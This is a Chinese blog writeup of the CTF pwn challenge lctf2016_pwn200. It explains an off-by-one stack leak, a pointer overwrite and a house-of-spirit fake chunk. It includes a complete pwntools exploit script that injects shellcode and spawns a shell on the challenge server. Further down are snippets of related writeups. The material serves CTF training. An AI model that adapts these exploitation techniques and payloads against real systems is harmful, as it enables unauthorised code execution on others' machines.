BUUCTF Pwn lctf2016_pwn200 WP

最新推荐文章于 2025-05-16 15:20:27 发布
最新推荐文章于 2025-05-16 15:20:27 发布
阅读量305 收藏 9
点赞数 3
分类专栏: Pwn BUUCTF 文章标签: 网络安全 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.youkuaiyun.com/qq_33348179/article/details/146523235
版权

checksec:

栈可执行 未开PIE Canary

64位 

IDA64查看:

跟进:

这个函数存在一个off by one漏洞 如果填充字符为0x30且无换行符 那么就会把v2末尾的0覆盖 从而让printf打印出RBP:

sub_4007DF函数用于读取id

该函数会先创建一个0x40的堆 然后读取0x40的数据 并复制到dest

存在溢出:read能够将dest(堆指针)给覆盖 从而改变ptr指向内容

再看下一个函数:

堆的增删功能 同时新建堆能控制大小 

思路:

        能利用printf泄露栈地址 而且能利用栈溢出覆盖堆指针 也能创建和删除堆

        利用house of spirit攻击 

        同时能修改在程序退出时的返回函数为shell地址(栈可执行)来执行binsh

先泄露栈地址调试看看:

标记的位置是泄露出来的rbp(栈地址) 往上的0x616161...是用于填充的a(头部距离该rbp所处的栈地址0x50) 再往上的0xabc(2748)是输入的id 

再往上就是第二次输入的位置(0x7ffee75a2730)(距离该rbp的位置0xC0)

如果要伪造chunk 那就是在距离rbp0x90处 指向该伪chunk的内容

大概思路是:

        先往第一次read的地方写入shellcode 补齐0x30字节的同时泄露rbp

        利用rbp以及刚刚的调试写出shellcode和伪chunk内容处 再构造伪chunk:

        presize置为0 + size为0x41 + 填充(用\x00绕过strcpy) + fakechunk地址 在填充到id前 id所在位置为nextchunk的size(0x20):

       最后释放使其进入fastbin 再malloc并编辑 让shellcode的地址覆盖返回地址 最后退出程序的时候就会返回shellcode的地址

exp:

from pwn import *

#p = process('./pwn200')
p = remote("node5.buuoj.cn",26757)
context(os='linux', arch='amd64', log_level='debug')

shellcode = asm(shellcraft.amd64.linux.sh(),arch='amd64')

payload = shellcode.ljust(0x30)



p.sendafter("who are u?\n", payload)
p.recvuntil(payload)
rbp = u64(p.recvn(6).ljust(8, b'\x00'))
print(hex(rbp))
shell_addr = rbp - 0x50
fake_chunk = rbp - 0x90
p.sendlineafter("id ~~?\n", b'32')

payload = p64(0) * 4 + p64(0) + p64(0x41)
payload = payload.ljust(56, b'\x00') + p64(fake_chunk)

p.sendafter("money~\n", payload)

p.sendlineafter("your choice : ", '2')
payload = b'a' * 0x18 + p64(shell_addr)
payload = payload.ljust(0x30, b'\x00')
#gdb.attach(p)
#pause()
p.sendlineafter('your choice : ', '1')
p.sendlineafter('how long?\n', str(0x30))
p.sendafter(str(0x30) + '\n',payload)
p.sendlineafter("your choice : ", '3')
p.interactive()

        

        

   

攻防世界 pwn-200
winterze的博客
04-04 702
攻防世界 pwn-200 0x00 函数分析 基本信息 [*] '/home/ububtu/ctf/pwn/pwn-200' Arch: i386-32-little RELRO: Partial RELRO Stack: No canary found NX: NX enabled PIE: No PIE (0x8...
【CTF资料-0x0002】PWN简易Linux堆利用入门教程by arttnba3
arttnba3的博客
02-25 6102
【CTF资料-0x0002】简易Linux堆利用入门教程by arttnba3老生常谈,[GITHUB BLOG ADDR](https://archive.next.arttnba3.cn/2021/02/24/%E3%80%90CTF%E8%B5%84%E6%96%99-0x0002%E3%80%91%E7%AE%80%E6%98%93Linux%E5%A0%86%E5%88%A9%E7%94%A8%E5%85%A5%E9%97%A8%E6%95%99%E7%A8%8Bby%20arttnba3/),请
lctf2016_pwn200
z1r0的博客
02-22 2813
lctf2016_pwn200 查看保护 这里有一个漏洞,read的时候可以泄露栈上的地址,因为没有\x00来截断。 这里会将buf的东西给复制到dest这里。然后ptr全局变量为dest。 这个函数就是一个add和delete的堆功能。 攻击思路:可以将shellcode写入第一次输入的地方,再借助这里输出ebp地址,然后算出shellcode_addr。到了strcpy这里的话可以使用\x00来截断复制功能然后填满buf,接着劫持free_got为shellcode_addr(free_got)
buu lctf2016_pwn200
qq_51474381的博客
04-25 341
代码分析 1.可泄露rbp(就是泄露栈地址,因为没有\x00截断时会连带输出后面的数据)。 2.buf可覆盖ptr(栈上变量覆盖),strcpy()可能会破坏我们构造好的payload,但是strcpy()并不会复制"\x00",所以在shellcode最前面要加上"\x00",这样就只有溢出,没有复制 3.后面就是堆的操作了,只有add和delete 总体思路 1.泄露rbp,获得栈地址。 2.写入shellcode+伪造size+覆盖dest,从而控制ptr。 3.free掉.
[BUUCTF-pwn]——lctf2016_pwn200
Y_peak的博客
03-11 739
[BUUCTF-pwn]——lctf2016_pwn200 题目地址:https://buuoj.cn/challenges#lctf2016_pwn200 还是先chekcsec 一下, 没有开启NX代表我们可以手写shellcode并且执行 在IDA, 中大家自己看看就好,我这里将两个漏洞的位置告诉大家就好 寻找偏移 思路 利用漏洞1, 获得main_ebp地址, 寻找到我们写入的shellcode距离的位置 利用漏洞2 覆盖dest变量值为free的got表的地址, 这样通过strcpy
l-ctf2016pwn200 hose-of-spirite
九层台
03-09 506
这里看可以输入48个字节,最后没有跟00能够泄露出来rbp 从ida上面看是这样的,id并没有保存。 但是实际上 id被保存到了这里。 var_38被定义为 刚好再输入的name上面。在栈上显示如下图 #coding=utf-8 from pwn import * context(arch='amd64',os='linux') context.log_level = 'debug' p =...
lctf2016_pwn200 堆利用
人饭子的博客
12-31 589
lctf2016:pwn200 堆利用 一、信息收集 RELRO:在Linux系统安全领域数据可以写的存储区就会是攻击的目标,尤其是存储函数指针的区域。 所以在安全防护的角度来说尽量减少可写的存储区域对安全会有极大的好处.GCC, GNU linker以及Glibc-dynamic linker一起配合实现了一种叫做relro的技术: read only relocation。大概实现就是由l...
2017湖湘杯pwn200
12-02
2017湖湘杯pwn200的题目,请大家自行下载。。。。。。
LCTF 2016-pwn100 从一道题悟出的知识
qq_41071646的博客
01-20 1469
这道题可是让我吃尽了苦头啊~~~~~~  这道题没有像那么复杂 可是就是一直做不出来。。。。。。。。。。。 先说一下 参考的资料吧  https://bbs.ichunqiu.com/forum.php?mod=viewthread&tid=42933&highlight=pwn 感谢i春秋的师傅   如果哪里不对 还请指教 首先这道题是 64位  那么 我们知道 x86...
[pwn][堆利用]house of spirit[例题:lctf2016_pwn200]
zhulintintao的博客
11-21 940
House of spirit 实现目的 malloc分配到目标地址 实现条件 free的参数可控 目标地址可以连续构造两个fake chunk的size域,需要地址对齐(即目标高低地址处均有可控区域) 实现方法 在目标地址伪造可以被释放到fastbin上的fake chunk 伪造fake chunk的同时伪造好其下一个chunk(物理上的)的size域 将目标地址作为参数free malloc一次,将返回指向目标地址的指针 实现实例 题目平台 buuctf 题目名
L-CTF2016 PWN200 writeup
哒君的博客
08-02 718
本以为已经可以做出题来了。。。没想到连利用点在哪都没看见 例行公事 居然什么保护都没开,有趣 利用点分析 v2位于rbp-0x30的位置,而name会读入0x30个字符,且如果读入0x30个字符的话末尾不会有\x00,这样在printf的时候就会顺带leak出rbp的值 id保存在rbp-0x38的位置 *buf在栈上的位置是rbp-0x40,dest在栈上的位置是rbp-0x8,但是b...
LCTF 2016 PWN200(House Of Spirit)
Bill
03-24 1785
L-CTF 2016 pwn200 漏洞简介 The house of Spirit The House of Spirit is a little different from other attacks in the sense that it involves an attacker overwriting an existing pointer before it is ‘fr...
一文解读,网络安全行业人才需求情况《网络安全产业人才发展报告》
weixin_59086772的博客
10-18 8697
随着近几天国家网络安全宣传周在全国各地开展活动,网络安全再一次成为热门话题。网络安全不再缩在小小的安全圈子里,惠及面越来越广。不少对网络安全颇有兴趣的朋友非常关心行业前景如何?该怎么提升自我能力,更快地加入网安行列。 今天雨笋君就10月13日在网络安全宣传周上发布的《2021网络安全人才报告》进行一个简单的行业前景分析。 一、网络安全行业市场发展情况 网络时代生活越来越离不开网络,与此同时发生的网络安全攻击事件、非法入侵等等一系列事件都威胁着普通人的生活。没有网络安全保障,个人和企业等重.
WEB安全--Java安全--shiro550反序列化漏洞
m0_74800552的博客
05-16 297
shiro550反序列化
安全巡检清单
yh
05-15 879
软件状态巡检应深入到系统内核层面。漏洞扫描是软件状态巡检的重要组成部分,需要定期对网络设备、主机、数据库、应用系统等进行全面的漏洞扫描,利用专业的扫描工具发现已知和未知的安全漏洞。通过严格执行本清单所列的各项检查内容,并结合企业自身的业务特点和安全需求进行适当调整和补充,可以有效地提升信息系统的整体安全水平,降低安全风险,为企业的稳健发展提供坚实保障。通过周期性的状态检查、安全扫描、日志分析和补丁管理,可以及时发现并修复潜在的安全隐患和漏洞,确保网络设备、服务器、操作系统及应用系统的高可用性和安全性。
安全版4.5.8开启审计后,hac+读写分离主备切换异常
HighGO
05-16 223
异常:hac集群一主两备环境,开启hgproxy和审计功能后,进行集群主备切换操作。切换过程持续近5分钟,主库方可切换到备节点上,其中未参与切换(原主与新主外的备节点)的备库无法拉起,持续restarting状态很长时间后start failed。解决此问题的安装包:hgdb-see-4.5.8-6954d9f.aarch64.rpm。BUG安装包: hgdb-see-4.5.8-db43858.aarch64.rpm。1、临时解决方案:关闭审计功能,修改审计参数后需要重启集群。系统平台:UOS (飞腾)
AI智能分析网关V4周界入侵检测算法精准监测与智能分析,筑牢周界安全防线
NVR安防视频技术
05-14 533
随着安全防范需求的不断提升,传统周界安防系统存在误报率高、响应迟缓、智能化程度低等问题,难以满足现代化安全管理的要求。
中大型水闸安全监测系统解决方案
最新发布
weixin_48039531的博客
05-16 757
然而,由于历史原因,许多水闸存在建设标准偏低、质量较差、配套设施不完善等问题,加之受“重建轻管”思想影响,多数水闸建成后缺乏有效的管理和维修养护,存在较多的安全隐患,安全运行风险突出。现代化的水闸安全监测系统不仅能够实现实时监测、数据分析、预警报警等功能,还能够通过三维可视化技术,实现水闸运行状态、水流情况、水位变化等数据的直观展示,为管理决策提供更加科学、准确的依据。通过实时监控水闸的结构状态、水文数据和环境变化,可以及时发现潜在的风险和问题,从而采取相应的预防措施,确保水闸的稳定性和耐久性。
buuctf pwn others_shellcode
02-25
### BUUCTF Pwn Others_shellcode 解题思路 #### 题目概述 此题目属于PWN类别中的shellcode编写挑战。目标是在给定环境中执行任意代码,通常通过构造特定的机器码来实现这一目的[^1]。 #### 环境准备 为了成功完成...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值